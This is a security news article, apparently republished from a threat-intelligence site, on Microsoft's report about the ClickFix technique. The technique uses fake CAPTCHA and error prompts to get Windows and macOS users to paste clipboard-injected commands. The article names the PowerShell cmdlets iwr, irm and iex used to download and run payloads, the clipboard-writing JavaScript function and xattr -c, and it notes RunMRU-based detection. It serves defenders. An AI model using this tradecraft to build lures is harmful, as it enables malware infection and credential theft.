Cybersecurity researchers have identified a sophisticated social engineering technique called ClickFix that has been rapidly gaining traction among threat actors since early 2024.
This deceptive attack method targets both Windows and macOS devices, tricking users into executing malicious commands through seemingly legitimate technical troubleshooting procedures.
The technique has been observed in campaigns affecting thousands of enterprise and consumer devices globally on a daily basis, representing a significant evolution in social engineering tactics.
The ClickFix technique operates by presenting users with fake error messages, CAPTCHA verifications, or human verification prompts that appear to require immediate action to resolve minor technical issues.
.webp "Microsoft Warns of Hackers Using ClickFix Technique to Attack Windows and macOS Devices 3")
These lures are typically delivered through phishing emails, malicious advertisements, or compromised websites that redirect victims to specially crafted landing pages.
The attack’s effectiveness lies in its exploitation of users’ natural tendency to solve apparent technical problems, making it particularly dangerous as it bypasses traditional automated security solutions through human interaction.
Microsoft analysts identified multiple threat actors leveraging ClickFix attacks to deliver a diverse array of malicious payloads, including the prolific Lumma Stealer infostealer, remote access tools such as Xworm and AsyncRAT, loaders like Latrodectus and MintsLoader, and sophisticated rootkits including a modified version of the open-source r77.
These payloads typically operate as “fileless” malware, loaded directly into memory by living-off-the-land binaries rather than being written to disk as traditional executable files.
The attack chain begins when victims encounter visual lures that mimic legitimate services such as Cloudflare Turnstile verification, Google reCAPTCHA, or even social media platforms like Discord.
When users interact with these fake verification systems, malicious JavaScript code executes in the background, copying obfuscated commands to the user’s clipboard using the navigator.clipboard.writeText() function.
Technical Implementation and Command Execution
The core of the ClickFix technique revolves around manipulating the Windows Run dialog box, accessed through the Windows key + R shortcut.
Threat actors have strategically chosen this approach because most users are unfamiliar with this Windows component and its potential security implications.
The malicious commands typically involve PowerShell cmdlets such as iwr (Invoke-WebRequest), irm (Invoke-RestMethod), and iex (Invoke-Expression) to download and execute payloads from remote servers.
.webp "Microsoft Warns of Hackers Using ClickFix Technique to Attack Windows and macOS Devices 4")
A notable case study involves the Lampion malware campaign first identified in May 2025, which targeted Portuguese organizations across government, finance, and transportation sectors.
The campaign utilized a sophisticated multi-stage infection process beginning with phishing emails containing ZIP files. Upon opening, these archives contained HTML files that redirected users to a fake Portuguese tax authority website hosting the ClickFix lure.
The subsequent PowerShell command downloaded an obfuscated VBScript that created additional scripts in the Windows %TEMP% directory and established persistence through scheduled tasks.
The technique’s adaptability extends beyond Windows environments, with recent campaigns observed targeting macOS users to deliver Atomic macOS Stealer (AMOS).
These attacks demonstrate the technique’s cross-platform capabilities, utilizing similar social engineering tactics while adapting the underlying commands for macOS terminal execution.
The macOS variant employed sophisticated password theft mechanisms, continuously prompting users for system passwords and utilizing the stolen credentials to bypass macOS security features through xattr -c commands.
Detection of ClickFix attacks relies on monitoring the RunMRU registry key, which maintains a history of Run dialog executions.
Security teams can identify suspicious activity by examining entries containing living-off-the-land binaries, direct IP addresses, content delivery network domains, or files with suspicious extensions.
Microsoft’s research reveals that threat actors frequently employ obfuscation techniques including Base64 encoding, string concatenation, and escaped characters to evade detection systems.
Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.
Source link
